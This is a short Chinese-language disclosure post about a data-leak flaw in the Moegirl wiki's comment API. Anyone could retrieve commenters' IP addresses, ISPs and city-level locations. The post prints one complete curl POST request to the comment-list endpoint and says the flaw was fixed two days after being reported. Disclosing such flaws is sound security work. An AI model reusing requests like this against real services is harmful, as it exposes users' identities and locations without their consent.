于 左右,评论区现开放了测试,第一条评论被发布。在测试开始由我发现并提报了漏洞,之后也在技术实现版和评论区处做出了警告(虽然许多人都不听劝)。
任何人都可以极其简单并匿名地获取所有评论发送时的 IP 地址。
curl --location 'https://api.moegirl.org.cn/moegirl.moepad.MoepadCommunityService/GetArticleCommentListWithUserInfo' --header 'Content-Type: application/grpc-web-text' --data 'AAAAACUKIwoYNjZhMzdmYTNiMmNlNDEyMjYwYzBjMjNhGAogAygEMgEB'
这就是一个非常简单的
POST
请求,而返回的数据中我们可以看到用户的账户名和评论、精确至市级的地址、网络运营商以及
IP 地址。
在提报后的两天之后,此漏洞终于被修复(指抹去了 IP 地址)…